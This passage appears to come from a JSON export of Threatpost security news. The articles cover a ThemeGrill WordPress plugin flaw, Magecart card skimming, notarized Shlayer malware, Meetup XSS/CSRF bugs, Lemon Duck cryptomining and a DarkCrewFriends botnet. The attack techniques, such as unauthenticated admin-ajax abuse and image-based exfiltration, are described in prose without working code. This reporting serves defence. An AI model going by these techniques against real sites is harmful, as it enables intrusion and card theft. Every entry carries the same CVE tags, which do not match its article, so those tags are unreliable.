\u201cSince it requires no suspicious-looking payload \u2026 it is not expected for any firewall to block this by default and a special rule needs to be created to block this vulnerability.\u201d\n\nVersions from 1.3.4 to 1.6.1 are impacted by this flaw. According to the [WordPress plugin repository](<https://wordpress.org/plugins/themegrill-demo-importer/advanced/>), versions 1.4, 1.5 and 1.6 make up 98.6 percent of active versions of the plugin. Researchers say that the issue has existed in the plugin\u2019s code for about three years (since version 1.3.4).\n\nResearchers discovered the vulnerability on Feb. 5 and reported it to the plugin. On Sunday, ThemeGrill released the new [patched version](<https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2245070%40themegrill-demo-importer%2Ftrunk&old=2190304%40themegrill-demo-importer%2Ftrunk&sfp_email=&sfph_mail=>) of the plugin, version 1.6.2. However, according to reports, active exploits of the vulnerability have started, with some affected websites showing a WordPress \u201cHello World\u201d post. The \u201cHello World\u201d post is a \u201cdummy\u201d post, set by WordPress, as a placeholder post for content upon initial installation.\n\n> There's currently a severe vuln in a wordpress plugin called \"themegrill demo importer\" that resetss the whole database. <https://t.co/tT4xiqjna5> It seems attacks are starting: Some of the affected webpages show a wordpress \"hello world\"-post. /cc [@webarx_security](<https://twitter.com/webarx_security?ref_src=twsrc%5Etfw>)\n> \n> \u2014 hanno (@hanno) [February 18, 2020](<https://twitter.com/hanno/status/1229716599227195393?ref_src=twsrc%5Etfw>)\n\nIn a message to Threatpost, WebARX confirmed that the vulnerability is being actively exploited in the wild, and said it has blocked over 16,000 attacks against this vulnerability since Feb. 16 (a list of IP addresses actively exploiting the flaw [can be found here](<https://www.webarxsecurity.com/critical-issue-in-themegrill-demo-importer/>)).\n\n## Flaw Technical Details\n\nResearchers said that the prerequisite for an exploit is that there must be a theme installed and activated on the affected websites that was published by ThemeGrill. And, in order to be automatically logged in as an administrator, there must be a user called \u201cadmin\u201d in the website\u2019s database.\n\nAfter the plugin detects that a ThemeGrill theme is installed and activated, it has the capability to load files (called /includes/class-demo-importer.php) which then interact with the admin_init hook. A hook is used as a way for one piece of code to interact or modify another piece of code. Admin_init specifically is used to initialize settings specific to the administrator functions.\n\nThe problem specifically stems from the plugin\u2019s admin_init hook calling to /wp-admin/admin-ajax.php, which does not require a user to be authenticated. This issue (which has occurred in other plugins before, including the [WP Live Chat Support](<https://threatpost.com/wordpress-wp-live-chat-support-plugin-fixes-xss-flaw/144856/>) and [others](<https://threatpost.com/wordpress-plugins-malvertising-backdoor-campaign/147926/>)) means that an attacker could merely specially crafted request to the /wp-admin/admin-ajax.php endpoint page and would then be granted access as a user with certain administrative permissions on the website.\n\n\u201cadmin_init is a hook that plugins can hook into,\u201d researchers told Threatpost. \u201cIt\u2019s executed on all admin screen/scripts. However, this also includes /wp-admin/admin-ajax.php which is also used for calls by unauthenticated users.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/02/18104233/banner-772x250.png>)\n\nAfter an attacker gains admin privileges, they could then be in control of the \u201cadmin\u201d user object and clear all WordPress tables that start with the defined WordPress database prefix. This would essentially clear the database so that is the website is reset to its default settings and all data in the database is cleared \u2013 including all user roles, website post and pages, and more, researchers told Threatpost.\n\nResearchers told Threatpost that the flaw doesn\u2019t yet have a CVE number or CVSS score. Threatpost has also reached out to ThemeGrill for further information but has not yet heard back by publication.\n\nIt\u2019s only the latest WordPress plugin to have a vulnerability. Last week, for instance, [popular WordPress plugin](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>) GDPR Cookie Consent, issued fixes for a critical flaw, that if exploited, could enable attackers to modify content or inject malicious JavaScript code into victim websites.\n\n**_Learn how Operational Technology and Information Technology systems are merging and changing security playbooks in this free Threatpost Webinar. Join us _**[**_Wednesday, Feb. 19 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/2652328115100076035?source=art>)**_ when a panel of OT and IT security experts will discuss how this growing trend is shaping security approaches for IoT and 5G rollouts. This webinar is for security and DevOps engineers, IoT edge developers and security executives._**\n\n**Share this article:**\n\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n * [Web Security](<https://threatpost.com/category/web-security/>)\n", "cvss3": {}, "published": "2020-02-18T17:27:33", "type": "threatpost", "title": "Active Exploits Hit Vulnerable WordPress ThemeGrill Plugin", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-02-18T17:27:33", "id": "THREATPOST:137B556D777466139D73B0ECF97E4E32", "href": "https://threatpost.com/active-exploits-hit-vulnerable-wordpress-themegrill-plugin/152947/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:26:44", "description": "Blue Bear Software, an administration and e-commerce platform for K-12 schools and other educational institutions, is warning its customers that it has suffered a Magecart attack.\n\nBlue Bear\u2019s platform enables management of school accounting, student fees and online stores. In a letter to those affected ([obtained](<http://www.documentcloud.org/documents/6596719-Active-Network-Blue-Bear-Notice.html>) by Bleeping Computer), the vendor\u2019s parent company, Active Networks, said that anyone who had purchased items from a school webstore that was powered by its platform are potentially affected.\n\n[Magecart](<https://threatpost.com/macys-data-breach-linked-to-magecart/150393/>) is an umbrella term encompassing several different threat groups who typically use the same _modus operandi_: They compromise websites by exploiting vulnerabilities in third-party e-commerce platforms, in order to inject card-skimming scripts on checkout pages.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAt Virus Bulletin last October, researchers at RiskIQ [said that](<https://threatpost.com/magecart-infestations-saturate-web/148911/>) Magecart is now so ubiquitous that its infrastructure is flooding the internet. There are at least 570+ known command-and-control (C2) domains for the group, with close to 10,000 hosts actively loading those domains, researchers said.\n\n\u201cThis time, the attack targeted an educational accounting software platform that parents use to pay for student fees, books and school supplies,\u201d Elad Shapira, head of research at Panorays, said in an emailed statement. \u201cOnline retailers like Blue Bear are prime targets for Magecart, because data is easily stolen during checkout, often through third parties, as customers enter their credit cards.\u201d\n\nIn this case, the card-skimmers were present on websites using Blue Bear from Oct. 1 to Nov. 13 and collected names, payment-card numbers, expiration dates and CVV codes, and Blue Bear user IDs and passwords. No Social Security numbers, driver license numbers or similar government ID card numbers were caught up in the breach.\n\nMagecart\u2019s focus on attacking victims via the supply chain is part of a larger trend of attackers wanting to \u2018own\u2019 an entire system, including partners and suppliers.\n\nCarbon Black\u2019s Global Incident Response Threat Report last year [found that](<https://threatpost.com/half-all-attacks-supply-chain/143391/>) 50 percent of today\u2019s attacks leverage \u201cisland hopping.\u201d This means that attackers are after not only one target network but also those that are connected via a supply chain.\n\n\u201cTo prevent such attacks from occurring, companies must create and put processes in place to manage and review their susceptibility to the Magecart threat in their cyber supply chain,\u201d said Shapira. \u201cDoing so is important throughout the whole third-party business relationship, and should include continuous monitoring of third parties\u2019 cyber-posture.\u201d\n\n_**Concerned about mobile security? **_[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) _**Top 8 Best Practices for Mobile App Security**__**, on Jan. 22 at 2 p.m. ET. **_**_Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts to discuss the secrets of building a secure mobile strategy, one app at a time._**_** **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)_**.**_\n", "cvss3": {}, "published": "2020-01-06T21:47:47", "type": "threatpost", "title": "Magecart Hits Parents and Students via Blue Bear Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-01-06T21:47:47", "id": "THREATPOST:9BCA61EE1DC2B7F4CCAA9D127D46DBA4", "href": "https://threatpost.com/magecart-blue-bear-attack/151585/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:14:34", "description": "Apple accidentally approved one of the most popular Mac malware threats \u2013 OSX.Shlayer \u2013 as part of its security notarization process.\n\nThe Apple notary service is an automated system on recent macOS versions that scans software (ranging from macOS apps, kernel extensions, disk images and installer packages) for malicious content and checks for code-signing issues. Then, when a macOS user installs the software, Apple\u2019s Gatekeeper security feature notifies them about whether any malicious code was detected before they open it.\n\nSecurity researchers [Peter Dantini](<https://twitter.com/PokeCaptain>) and Patrick Wardle recently discovered that Apple inadvertently notarized malicious payloads that were utilized in a recent adware campaign.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cUnfortunately a system that promises trust, yet fails to deliver, may ultimately put users at more risk,\u201d said Wardle in a [Sunday analysis](<https://objective-see.com/blog/blog_0x4E.html>). \u201cHow so? If Mac users buy into Apple\u2019s claims, they are likely to fully trust any and all notarized software. This is extremely problematic as known malicious software (such as OSX.Shlayer) is already (trivially?) gaining such notarization.\u201d\n\nOn Friday, Dantini noticed that a website (homebrew[.]sh) was actively hosting an adware campaign. The website is likely spoofing the legitimate Homebrew site (hosted at brew.sh), a free and open-source software package management system that simplifies the installation of software on macOS.\n\n> So I accidentally found a thing <https://t.co/WVL86rYzrm>\n> \n> \u2014 Peter H. Dantini (@PokeCaptain) [August 31, 2020](<https://twitter.com/PokeCaptain/status/1300440938301607939?ref_src=twsrc%5Etfw>)\n\nWhen users visited the website, it redirected several times before telling them that their Adobe Flash Player is out of date and recommending an update (via at least three separate pop ups in the browser). While the campaign seems like a fairly run-of-the-mill adware attack, what\u2019s different is that Apple\u2019s notarization requirements do not trigger a warning notification telling the user that the developer cannot be verified, and that it is unknown whether the app is free from malware.\n\nThe adware payloads were fully notarized in this campaign, meaning the malicious payloads were submitted to Apple prior to distribution. They were scanned by the mobile giant and no malicious code was detected via Apple\u2019s automated system.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/08/31142818/notarization.png>)Upon further inspection, Wardle discovered that the notarized payloads appear to be OSX.Shlayer malware.\n\nAfter running the payloads in an instrumented virtual machine captures, Wardle was able to discover the execution of various shell commands. These commands change file modes, execute and delete files, and more.\n\nShlayer is a top common threat for Macs \u2014 In fact, last year it made up 29 percent of all attacks on macOS devices in Kaspersky\u2019s telemetry for 2019, making it the [No. 1 Mac malware threat](<https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/>) for the year. [More recently,](<https://threatpost.com/shlayer-mac-malware-extra-sneakiness/156669/>) a new variant of the malware has been spotted actively using poisoned Google search results in order to find its victims.\n\nAfter the malicious payloads were spotted, Wardle notified Apple, which revoked their certificates on Aug. 28. Then, on Aug. 30 (Sunday), the adware campaign was still live and serving up new notarized payloads.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/08/31142859/blocked.png>)\n\n\u201cBoth the old and \u2018new\u2019 payload(s) appears to be nearly identical, containing OSX.Shlayer packaged with the Bundlore adware,\u201d said Wardle. \u201cHowever the attackers\u2019 ability to agilely continue their attack (with other notarized payloads) is noteworthy. Clearly in the never-ending cat and mouse game between the attackers and Apple, the attackers are currently (still) winning.\u201d\n\nThe Bundlore adware\u2019s goal is generally to install various browser extensions and show victims various ads, Wardle told Threatpost. As of Monday, these newer notarized payloads were also revoked by Apple, Wardle told Threatpost.\n\n\u201cMalicious software constantly changes, and Apple\u2019s notarization system helps us keep malware off the Mac and allow us to respond quickly when it\u2019s discovered,\u201d an Apple spokesperson told Threatpost. \u201cUpon learning of this adware, we revoked the identified variant, disabled the developer account, and revoked the associated certificates. We thank the researchers for their assistance in keeping our users safe.\u201d\n\n**[On Wed Sept. 16 @ 2 PM ET:](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>) Learn the secrets to running a successful Bug Bounty Program. [Resister today](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) for this FREE Threatpost webinar \u201c[Five Essentials for Running a Successful Bug Bounty Program](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this [LIVE](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) webinar.**\n", "cvss3": {}, "published": "2020-08-31T19:45:07", "type": "threatpost", "title": "Apple Accidentally Notarizes Shlayer Malware Used in Adware Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-31T19:45:07", "id": "THREATPOST:2DF088ED0B48BE31C97E898391B83566", "href": "https://threatpost.com/apple-accidentally-notarizes-shlayer-malware/158818/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:18:21", "description": "A Magecart credit-card skimmer was used to attack online customers of the retailer Claire\u2019s for a month and a half, according to researchers.\n\nClaire\u2019s \u2013 a purveyor of jewelry and accessories \u2013 closed its 3,000 physical retail locations worldwide on March 20, in the wake of the COVID-19 pandemic. An analysis from the Sansec Threat Research Team shows that a Magecart group saw an opportunity to harvest payment-card data in the closures \u2013 likely assuming that online sales activity would ramp up with no brick-and-mortar outlets available to shoppers.\n\n\u201cFollowing common Magecart malpractice, payment skimmers were injected and used to steal customer data and cards,\u201d according to Sansec.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n[Magecart](<https://threatpost.com/macys-data-breach-linked-to-magecart/150393/>) is an umbrella term encompassing several different threat groups who typically use the same _modus operandi._ They compromise websites typically by exploiting vulnerabilities or otherwise compromising in third-party eCommerce platforms, in order to inject card-skimming scripts on checkout pages. Magento-based hacks are seen most often, but Magecart also attacks other platforms, including Opencart, BigCommerce, Prestashop and Salesforce.\n\nAt Virus Bulletin last October, researchers at RiskIQ [said that](<https://threatpost.com/magecart-infestations-saturate-web/148911/>) Magecart is now so ubiquitous that its infrastructure is flooding the internet. There are at least 570+ known command-and-control (C2) domains for the group, with close to 10,000 hosts actively loading those domains, researchers said.\n\nIn this case, Sansec telemetry picked up malicious code being injected into the Claire\u2019s official eCommerce website (and that of its sister store, Icing), starting in late April. The malware persisted until this weekend, when it was removed on June 13.\n\nSpecifically, code was added to the online check-out pages for the stores, and linked to the \u201cSubmit\u201d button that shoppers use to submit their payment information. To hook up with the Submit function, the malware was added to the app.min.js file, which is a legitimate file hosted on the store servers.\n\nWhen a user clicked the button, the injected code would intercept all customer information that was entered during checkout, render it as an image, encode it with base64, and send it off to a special collection website controlled by the attackers, \u201cclaires-assets[dot]com.\u201d\n\n\u201cThis approach uses image exfiltration (which is often not monitored by security systems) and uses a U.S.-based collection server, which is rare for this type of attack,\u201d Sansec founder Willem de Groot told Threatpost. \u201cI suspect that the collection server will be confiscated by U.S. law enforcement shortly.\u201d\n\nOn the technical front, \u201cA temporary image is added to the DOM with the __preloader identifier,\u201d according to the [Sansec analysis](<https://sansec.io/research/magecart-corona-lockdown>), released on Monday. \u201cThe image is located on the server as controlled by the attacker. Because all of the customer submitted data is appended to the image address, the attacker now has received the full payload. Immediately, the image element is removed.\u201d\n\nClaire\u2019s runs on the Salesforce Commerce Cloud, previously known as Demandware, which is a hosted eCommerce platform, according to researchers. While Sansec doesn\u2019t have insight into how the website was initially compromised, any of the usual suspects could have been a factor. Those could include leaked admin credentials, spearphishing of Claire\u2019s employees or a compromised internal network.\n\nSansec also pointed out that it\u2019s unlikely that a vulnerability in the Salesforce platform itself was exploited, given that the skimmer was injected directly into code hosted on Claire\u2019s servers.\n\n\u201cSo, there is no \u2018supply-chain attack\u2019 involved, and attackers have actually gained write access to the store code,\u201d researchers said. \u201cIt is unlikely that the Salesforce platform got breached or that Salesforce is responsible for this incident.\u201d\n\nAlso, the claires-assets[dot]com collection website was set up on March 21, a day after the Claire\u2019s retail stores closed. Yet activity didn\u2019t start until the last week in April \u2014 also suggesting that a known bug in Salesforce wasn\u2019t the culprit. \u201cThe domain period between exfil domain registration and actual malware suggests that it took the attackers a good four weeks to gain access to the store,\u201d according to the analysis.\n\nThat said, de Groot noted that \u201cSaaS platforms like Salesforce, Shopify and BigCommerce have much better potential visibility into abuse of their platform, and increased ability to secure their customer base. While legally not culpable, one could argue that they could do more to scan or protect their stores.\u201d\n\nSansec also said that Claire\u2019s responded promptly when notified of the issue. The store issued a statement:\n\n\u201cClaire\u2019s cares about protecting its customers\u2019 data. On Friday, we identified an issue related to our e-commerce platform and took immediate action to investigate and address it. Our investigation identified the unauthorized insertion of code to our e-commerce platform designed to obtain payment card data entered by customers during the checkout process. We removed that code and have taken additional measures to reinforce the security of our platform.\u201d\n\nIt also said that it\u2019s working on determining which of its customers were affected by the incident, so it can issue notifications. For it\u2019s part, Sansec is unsure of the scope of the activity.\n\n\u201cSince the interception happened in real time in the browsers of customers, we have no visibility in the scope of the theft,\u201d de Groot told Threatpost. \u201cClaire\u2019s obviously knows, but I doubt they want to share that info.\u201d\n\n_**Are you on top of the shifting insider threats within your business? On **_**[_June 24 at 2 p.m. ET_](<https://attendee.gotowebinar.com/register/3265005683762389007?source=ART>)**_**, join Threatpost and our panel of experts for a FREE webinar, **__**\u201c**_**_The Enemy Within: How Insider Threats Are Changing_****_.\u201d _**_**Get exclusive insights on how **_**_remote working has increased the risk of insider threats, and how to gain visibility into employee behavior while striking the right balance between privacy and ease of use. _****_[Please register here](<https://attendee.gotowebinar.com/register/3265005683762389007?source=ART>)_**_** for this Threatpost webinar.**_\n", "cvss3": {}, "published": "2020-06-15T15:36:53", "type": "threatpost", "title": "Claire's Customers Targeted with Magecart Payment-Card Skimmer", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-06-15T15:36:53", "id": "THREATPOST:63A5AF6DBA80B1406297BB5825D56E32", "href": "https://threatpost.com/claires-customers-magecart-payment-card-skimmer/156552/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:15:56", "description": "A popular online social service, Meetup, has fixed several critical flaws in its website. If exploited, the flaws could have enabled attackers to hijack any Meetup \u201cgroup,\u201d access the group\u2019s member details and even redirect Meetup payments to an attacker-owned PayPal account.\n\nMeetup is [a service](<https://www.meetup.com/>) with a user base of over 35 million users, used to organize online groups with events for people with similar interests. These events are either for free, or participants can register for a fee using PayPal. While events are typically in person, in light of the ongoing pandemic, many events have moved to virtual settings.\n\n\u201cCheckmarx found several \u2018more-common\u2019 API security issues like lack of resources and rate-limiting and excessive data exposure, as well as some serious cross-site scripting (XSS) and cross-site request forgery (CSRF) vulnerabilities on Meetup.com that could put users at risk,\u201d said researchers with Checkmarx, in research disclosed Monday at [Black Hat USA 2020.](<https://threatpost.com/category/bh/>)\n\n[**[Learn more about the critical [Meetup](<https://threatpost.com/black-hat-usa-2020-critical-meetup-com-flaws-reveal-common-appsec-holes/157950/>) flaws \u2013 and other AppSec trends and threats researchers expect to see at Black Hat USA 2020 this year \u2013 in Threatpost\u2019s [exclusive](<https://threatpost.com/black-hat-usa-2020-critical-meetup-com-flaws-reveal-common-appsec-holes/157950/>) interview with Checkmarx]**](<https://threatpost.com/black-hat-usa-2020-critical-meetup-com-flaws-reveal-common-appsec-holes/157950/>)\n\nResearchers disclosed the issues to Meetup, which has since fixed all the vulnerabilities as of July 15. The flaws were not publicly disclosed by researchers until Monday.\n\n\u201cMeetup takes reports about its data security very seriously, and appreciates Checkmarx\u2019s work in bringing these issues to our attention for investigation and follow up,\u201d according to a Meetup statement.\n\nThe first flaw researchers discovered was stored a cross-site scripting vulnerability on Meetup\u2019s discussion feature, which is activated by default in a Meetup group. The flaw has a CVSS score of 8.7 out of 10, making it high severity. The issue is that Meetup does not properly sanitize the discussion field.\n\nTo exploit the flaw, an attacker simply needs to post a custom script to the Meetup discussion forum. This causes a JavaScript popup to occur as soon as any user visits the Meetup page. When the user clicks the popup, an attacker can then carry out various malicious functions, such as stealing their web browsing data (sessions and cookies).\n\n\u201cNow, instead of have a message or a discussion or a post on the page, we could have put some benign message actually in the background on a script,\u201d Erez Yalon, the director of security research with Checkmarx, told Threatpost. \u201cSo this by itself is very bad already, because it means that in the context of a web browser, we can do whatever we want. Now for every person who visits this discussion board, so it can be stealing information that is part of your web browsing process like cookies and sessions, and things like that. We can deface the website or even do some cryptomining on the web browser.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/08/03080737/meetup-flaws.png>)\n\nCredit: Checkmarx\n\nThe attack was made more severe after researchers also found a CSRF glitch on the Payments Received API endpoint of Meetup. CSRF means that when an attacker is authenticated on the server they also have control over the client.\n\nResearchers were able to chain together the XSS flaw and CSRF glitch, which is the \u201choly grail\u201d for attackers: \u201cWhen you manage to, to chain these two together, and sometimes there are no limits to what can actually happen,\u201d said Yalon.\n\nThat means that if a user with high privileges (like a meetup group \u201cco-organizer\u201d) clicks on the malicious script, attackers could then escalate their privileges to \u201cco-organizer\u201d, hijack a Meetup group page, and completely manage the group. Since the form to change the PayPal recipient\u2019s email address in Settings / Payments received is vulnerable to CSRF, attackers would be also able to change the PayPal email address of every Meetup user to their own PayPal email address, without the victims noticing.\n\nResearchers also found several other less serious issues in Meetup, including that the website had a lack of resources and rate-limiting and an Excessive Data Exposure issue.\n\nThe research was unveiled [this week at Black Hat USA 2020](<https://threatpost.com/black-hat-usa-2020-preview-election-security-covid-disinformation-and-more/157875/>), which kicked off on Saturday and [will focus largely on](<https://threatpost.com/category/bh/>) new security threats, election security, COVID-19 and remote work, and other themes.\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n", "cvss3": {}, "published": "2020-08-03T13:05:11", "type": "threatpost", "title": "Meetup Critical Flaws Allow 'Group' Takeover, Payment Theft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-03T13:05:11", "id": "THREATPOST:54A5A39D65B32844C215D89668BFB79D", "href": "https://threatpost.com/critical-meetup-website-flaws-takeover-payment-theft/157934/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:25:07", "description": "Printers, smart TVs and automated guided vehicles that depend on Windows 7 have become the latest juicy targets for cybercriminals leveraging a \u201cself-spreading\u201d variant of the malware Lemon Duck. In a report released Wednesday by TrapX Security, researchers warn manufacturers dependent on IoT devices are targets in a new global campaign leveraging the malware variant.\n\nCriminals behind the wave of attacks are singling out IoT gear in hopes of enlisting them into a \u201cslave army\u201d of crypto-mining devices focused on generating Monero coins via the XMRig mining tool. Researchers warn that the processor-intensive mining efforts are taking their toll on gear and triggering equipment malfunctions along with exposing devices to safety issues, disruption of supply chains and data loss.\n\nThe campaign is similar to a [Lemon Duck campaign spotted in October](<https://news.sophos.com/en-us/2019/10/01/lemon_duck-powershell-malware-cryptojacks-enterprise-networks>), however in this campaign the malware is being used to intentionally target and cause harm to large manufacturers, researchers told Threatpost. \n[](<https://threatpost.com/newsletter-sign/>)\n\nThe [26-page report by TrapX Research Labs](<https://finance.yahoo.com/news/trapx-security-identifies-malware-campaign-130000671.html>) cites a number of 2019 attacks against three large global manufacturers. The common thread is the use of Lemon Duck malware and the presence of Windows 7 in embedded or associated systems. Windows 7, which TrapX estimates is still used by 200 million devices, is no longer receiving security updates by Microsoft as of January 14, 2020.\n\nIn each of the case studies outlined by researchers, weaknesses in Windows 7 were used by adversaries as the point of entry. Exploited were unpatched vulnerabilities tied to Microsoft\u2019s implementation of the Server Message Block (SMB) protocol in the operating system by [the EternalBlue exploits](<https://threatpost.com/leaked-nsa-exploit-spreading-ransomware-worldwide/125654/>). In addition, researchers said attackers launched SQL injection attacks against vulnerabilities in [the MySQL database application](<https://threatpost.com/critical-mysql-vulnerabilities-can-lead-to-server-compromise/121738/>).\n\n\u201cThe malware sample intercepted and analyzed by TrapX is part of the Lemon Duck sample family running on a double-click action or through persistence mechanisms,\u201d wrote researchers. \u201cFirst, the malware scanned the network for potential targets, including those with SMB ([port] 445) or MSSQL ([port] 1433) services open. Once finding a potential target, the malware ran multiple threads with multiple functionalities.\u201d\n\nOne of those functions include brute force password attacks to crack open services to further download and spread malware via SMB or MSSQL. Another included the \u201crunning of invoke-mimikatz via import-module to obtain NTLM hashes and gain access for the further download and spread of malware via SMB.\u201d\n\nResearchers said the Lemon Duck malware persisted on infected systems via scheduled tasks, which included PowerShell Scripts that invoked additional Lemon Duck PowerShell scripts, which then installed the Monero miners (XMRig).\n\nIt\u2019s for good reason that attackers have focused on Windows 7 machines. Researchers said that attacks leveled against Windows 10 machines have consistently been thwarted by basic system defenses.\n\n\u201cThe malware would be quarantined on a Windows 10 system with Windows Defender Virus &amp; Threat protection activated, even if the malware successfully copied itself to the system,\u201d researchers said. \u201cIn contrast, the malware stayed and ran on an infected Windows 7 system even with Windows Defender activated.\u201d\n\nMitigation spelled out by TrapX involves enforcing a strong password policy across all networks and subsystems, keeping systems patched and exercising hyper vigilance when it comes to managing network shares and disabling anonymous logins. Researchers also highly recommend ending reliance on Windows 7.\n", "cvss3": {}, "published": "2020-02-05T18:50:48", "type": "threatpost", "title": "New Lemon Duck Malware Campaign Targets IoT, Large Manufacturers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-02-05T18:50:48", "id": "THREATPOST:FC124FCB1BDB55D5A63163F8F4720021", "href": "https://threatpost.com/lemon-duck-malware-targets-iot/152596/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:17:40", "description": "The hackers-for-hire group DarkCrewFriends has resurfaced and is targeting content management systems to build a botnet. The botnet can be marshalled into service to carry out a variety of criminal activities, including distributed denial-of-service (DDoS) attacks, command execution, information exfiltration or sabotage of an infected system.\n\nResearchers said they observed DarkCrewFriends exploiting an unrestricted file upload vulnerability to compromise PHP servers that run websites. After compromise, a malicious PHP web shell is installed as a backdoor, which in turn sets up a connection to a command-and-control (C2) server using an Internet Relay Chat (IRC) channel, according to Check Point researchers Liron Yosefian and Ori Hamama.\n\n\u201cMany applications allow users to upload certain files to their servers, such as images or documents,\u201d explained the researchers on Thursday in a [blog post](<https://research.checkpoint.com/2020/the-return-of-the-bot-shop-crew/>). \u201cThese files can put the system at risk if they are not properly handled. A remote attacker can send a specially crafted request to a vulnerable server and upload an unrestricted file while bypassing the server\u2019s file extension check. This can eventually result in arbitrary code execution on the affected system.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe exploit for the particular vulnerability being targeted is a zero-day that was created and published by DarkCrewFriends, according to Check Point. Threatpost has reached out for more information on the bug and other details of the campaign.\n\nThe web shell on the victim\u2019s server defines either a GET parameter called osc or a GET parameter called anon, and executes a decompressed base64 string, according to the analysis. When researchers decoded the string, they discovered commands to download and execute two .AFF files. .AFF is a spellcheck dictionary file type used by Kingsoft WPS Office and Apache OpenOffice, which are free Office suite applications.\n\n\n\nThe infection chain. Source: Check Point\n\n\u201cWhen we downloaded both .AFF files, we saw that those files were actually PHP and Perl files,\u201d the researchers explained. \u201cThe hidden file extension is used to avoid detection and confuse the issue.\u201d\n\nThese files are both variants of the main malware module, which has a wide range of capabilities, including the ability to execute shell commands; gather information on running services on the host computer; download or upload FTP files; scan open ports; and conduct multiple types of DDoS attacks (including UDP and TCP DDoS, HTTP flood, IRC CTCP flood and more).\n\n\u201cThe attackers create a network of botnets by using the IRC protocol to infect connected servers,\u201d the analysts said. \u201cThis provides them with a more powerful attack tool and is also used in the traffic services they offer for sale.\u201d\n\nNone of the malware binaries had been uploaded to Virus Total, they added.\n\n\u201cFollowing the various scenarios and attack methods\u2026we conclude that the impact on the victim\u2019s infrastructure can be severe and have significant repercussions,\u201d Yosefian and Hamama concluded.\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-06-26T20:53:18", "type": "threatpost", "title": "DarkCrewFriends Returns with Botnet Strategy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-06-26T20:53:18", "id": "THREATPOST:400B0D790B8223A5A004460CD9A927B4", "href": "https://threatpost.com/darkcrewfriends-returns-botnet/156963/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:17:41", "description": "Researchers are warning that the websites of eight U.S. cities \u2013 across three states \u2013 have been compromised with payment card-stealing Magecart skimmers. The websites all utilize [Click2Gov municipality payment software](<https://threatpost.com/payment-card-breach-hits-8-cities-using-vulnerable-bill-portal/148521/>), which was previously involved in data breaches.\n\nUnlike other skimmers, which grab data on various types of payment forms on websites, the skimmer in this incident appears to only target website payment forms by Click2Gov. Click2Gov software is used in self-service bill-paying portals used by utilities and community development organizations for things such as paying parking tickets online.\n\n\u201cThe attack occurs when victims make an online payment on the compromised 